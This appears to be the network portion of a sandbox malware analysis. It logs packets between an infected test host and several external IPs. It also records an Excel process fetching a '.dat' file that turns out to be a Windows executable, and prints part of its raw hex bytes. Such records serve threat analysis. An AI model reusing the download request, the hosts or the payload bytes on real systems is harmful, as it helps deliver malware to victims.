Sep 28, 2021 22:14:51.792325974 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.792359114 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.792407990 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.792437077 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.792484045 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.792510986 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.792562008 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.792602062 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.792654037 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.792680979 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.792728901 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.792758942 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.792810917 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.792828083 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.792885065 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.793282032 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.866359949 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.866544008 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.996561050 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.996752977 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.996793032 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.996818066 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.996824026 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.996834993 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.996850967 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.996860981 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.996874094 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.996885061 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.996901989 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.996908903 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.996931076 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.996942997 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.996958017 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.996969938 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.996984005 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.996998072 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.997010946 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.997023106 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.997047901 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.997112036 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.998368979 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.055041075 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.055330992 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.203094959 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.203203917 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.203253031 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.203320026 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.203322887 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.203380108 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.203389883 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.203428984 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.203465939 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.203483105 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.203500986 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.203504086 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.203516960 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.203542948 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.203567982 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.203581095 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.203608036 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.203619957 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.203628063 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.203659058 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.203674078 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.203707933 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.203711987 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.203756094 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.204353094 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.242712021 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.242870092 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.410149097 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410191059 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410217047 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410239935 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410263062 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410288095 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410312891 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410317898 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.410337925 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410343885 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.410361052 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.410362959 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410376072 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.410389900 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410403013 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.410414934 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410422087 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.410439014 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410449028 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.410463095 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410470009 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.410486937 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410497904 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.410511017 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410522938 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.410535097 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410542965 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.410558939 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410571098 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.410587072 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410588026 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.410610914 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410623074 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.410634995 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410640955 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.410657883 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410667896 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.410681963 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410693884 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.410706997 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410718918 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.410731077 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.410738945 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.410768032 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.412272930 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.430644989 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.430762053 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.617098093 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.617121935 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.617135048 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.617150068 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.617167950 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.617185116 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.617198944 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.617214918 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.617228985 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.617244005 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.617258072 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.617273092 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.617345095 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.617434978 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.619385958 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.619476080 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.619925976 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.823513985 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.823549986 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.823576927 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.823596954 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.823625088 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.823643923 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.823657990 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.823678970 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.823694944 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.823704958 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.823724031 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.823728085 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.823745012 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.823753119 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.823776007 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.823781967 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.823797941 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:52.823812962 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.823853970 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:52.827244997 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.011290073 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.011470079 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.030011892 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.030158997 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.030191898 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.030224085 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.030256987 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.030280113 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.030282974 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.030303001 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.030306101 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.030307055 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.030308008 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.030309916 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.030332088 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.030348063 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.030354977 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.030368090 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.030385017 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.030385017 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.030390024 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.030400038 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.030410051 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.030419111 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.030436039 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.031949043 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.199135065 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.199327946 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.236825943 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.236860037 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.236876011 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.236893892 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.236917019 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.236938000 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.236958027 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.236979008 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.237001896 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.237025023 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.237045050 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.237154007 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.237694025 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.237719059 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.237730026 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.237741947 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.237763882 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.237785101 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.237796068 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.237802029 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.237824917 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.237847090 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.237858057 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.237868071 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.237889051 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.237906933 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.237910032 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.237938881 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:53.237941027 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.238049984 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.239322901 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:53.265450001 CEST	49168	80	192.168.2.22	94.140.112.126
Sep 28, 2021 22:14:56.274494886 CEST	49168	80	192.168.2.22	94.140.112.126
Sep 28, 2021 22:15:02.280958891 CEST	49168	80	192.168.2.22	94.140.112.126
Sep 28, 2021 22:15:14.296915054 CEST	49169	80	192.168.2.22	94.140.112.126
Sep 28, 2021 22:15:17.305135012 CEST	49169	80	192.168.2.22	94.140.112.126
Sep 28, 2021 22:15:23.311655045 CEST	49169	80	192.168.2.22	94.140.112.126
Sep 28, 2021 22:15:35.358654976 CEST	49170	80	192.168.2.22	185.141.27.213
Sep 28, 2021 22:15:38.366909981 CEST	49170	80	192.168.2.22	185.141.27.213
Sep 28, 2021 22:15:44.373528004 CEST	49170	80	192.168.2.22	185.141.27.213
Sep 28, 2021 22:15:56.389406919 CEST	49171	80	192.168.2.22	185.141.27.213
Sep 28, 2021 22:15:58.301590919 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:15:58.301810980 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:15:59.398540974 CEST	49171	80	192.168.2.22	185.141.27.213
Sep 28, 2021 22:16:05.404292107 CEST	49171	80	192.168.2.22	185.141.27.213
Sep 28, 2021 22:16:41.055510998 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:16:41.243612051 CEST	80	49167	190.14.37.187	192.168.2.22

HTTP Request Dependency Graph

190.14.37.187

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	190.14.37.187	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 22:14:49.526351929 CEST	0	OUT	GET /44467.926671412.dat HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 190.14.37.187 Connection: Keep-Alive
Sep 28, 2021 22:14:50.548295975 CEST	1	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 28 Sep 2021 20:14:50 GMT Content-Type: application/octet-stream Content-Length: 259072 Connection: keep-alive X-Powered-By: PHP/5.4.16 Accept-Ranges: bytes Expires: 0 Cache-Control: no-cache, no-store, must-revalidate Content-Disposition: attachment; filename="44467.926671412.dat" Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 16 03 00 00 da 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 27 06 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 30 03 00 70 00 00 00 f4 60 27 06 7c 01 00 00 00 70 27 06 d8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 27 06 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6a 14 03 00 00 10 00 00 00 16 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 30 03 00 00 02 00 00 00 1a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 10 00 00 00 40 03 00 00 60 00 00 00 1c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 30 06 24 06 00 50 03 00 00 68 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 6e 07 00 00 00 60 27 06 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 07 00 00 00 70 27 06 00 08 00 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL;a!0'0p`'\|p'`'.textj `.edatap0@@.data@`@.data0$Ph\|@.rdatatn`'@.rsrcp'@@
Sep 28, 2021 22:14:50.548338890 CEST	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 00 55 89 e5 83 c4 fc e8 4e 35 00 00 3b d8 0f 84 4a 01 00 00 60 03 fb 41 03 c8 50 51 68 25 05 00 00 83 bb b0 50 43 00 00 75 1a ff 93 60 60 67 06 57 83 e7 00 31 c7 83 a3 b0 50 43 Data Ascii: jUN5;J`APQh%PCu``gW1PCPC_h%UCu``gU1UC1UC]RCu`gW+<RC1RC_j@SCu`gQ3SC1SCYhPCud`gPEuPC
Sep 28, 2021 22:14:50.548356056 CEST	4	IN	Data Raw: 98 55 43 00 00 31 93 98 55 43 00 8b 55 fc 6a 00 83 bb bc 55 43 00 00 75 1e ff 93 0c 60 67 06 89 4d fc 83 e1 00 31 c1 83 a3 bc 55 43 00 00 09 8b bc 55 43 00 8b 4d fc ff 93 54 60 67 06 83 bb 30 51 43 00 00 75 2b 50 ff 93 60 60 67 06 89 4d fc 2b 4d Data Ascii: UC1UCUjUCu`gM1UCUCMT`g0QCu+P``gM+M0QC0QCMP\|UCu#Pd`gu)1\|UCuUC,QCu'P``gM1,QC1,QCM)3PCTCuPd`gj
Sep 28, 2021 22:14:50.548373938 CEST	6	IN	Data Raw: 06 89 55 fc 33 55 fc 09 c2 83 a3 50 51 43 00 00 31 93 50 51 43 00 8b 55 fc ff 93 64 60 67 06 83 bb 18 52 43 00 00 75 27 50 ff 93 64 60 67 06 56 83 e6 00 09 c6 83 a3 18 52 43 00 00 09 b3 18 52 43 00 5e 81 e0 00 00 00 00 8b 04 e4 83 ec fc 89 75 fc Data Ascii: U3UPQC1PQCUd`gRCu'Pd`gVRCRC^u1TUCuRCu``gV+41RC1RC^VXRCu``gU11XRCUTQCu~TCud`gPEuTCd`gQCu#P``gQ+QCQCY1
Sep 28, 2021 22:14:50.548393011 CEST	7	IN	Data Raw: 83 a3 20 55 43 00 00 31 93 20 55 43 00 5a 29 c9 8f 45 f8 33 4d f8 29 c0 8b 04 e4 83 c4 04 50 83 bb 80 54 43 00 00 75 2b 51 ff 93 64 60 67 06 89 4d f8 83 e1 00 09 c1 83 a3 80 54 43 00 00 31 8b 80 54 43 00 8b 4d f8 81 e1 00 00 00 00 03 0c e4 83 c4 Data Ascii: UC1 UCZ)E3M)PTCu+Qd`gMTC1TCMQUCud`gPEuUC`gPCu'P`gVPC1PC^PEuQCTCud`gj<)TC_E3M\PCuQ`gj<
Sep 28, 2021 22:14:50.548434019 CEST	8	IN	Data Raw: 52 43 00 8b 4d f0 83 bb 08 54 43 00 00 0f 85 81 00 00 00 83 bb 78 52 43 00 00 75 16 ff 93 0c 60 67 06 89 55 f0 29 d2 09 c2 89 93 78 52 43 00 8b 55 f0 ff 93 64 60 67 06 83 bb 70 53 43 00 00 75 27 50 ff 93 0c 60 67 06 57 83 e7 00 31 c7 83 a3 70 53 Data Ascii: RCMTCxRCu`gU)xRCUd`gpSCu'P`gW1pSC1pSC_3PEuTCUCu`gj1UCZWTCu`g}1TC}PCDRCu`gW1DRCDRC_d`gTCu'
Sep 28, 2021 22:14:50.548446894 CEST	8	IN	Data Raw: 00 00 09 bb 28 53 43 00 8b 7d f0 81 e0 00 00 00 00 8b 04 e4 83 ec fc 53 83 e3 00 31 c3 83 65 f4 00 09 5d f4 5b 83 bb 3c 51 43 00 00 75 1e ff 93 60 60 67 06 89 4d f0 83 e1 00 31 c1 83 a3 3c 51 43 00 00 31 8b 3c 51 43 00 8b 4d f0 f7 06 00 00 00 80 Data Ascii: (SC}S1e][<QCu``gM1<QC1<QCM<HQCu`gV1HQCHQC^V RCu`g}+}1 RC RC}60U
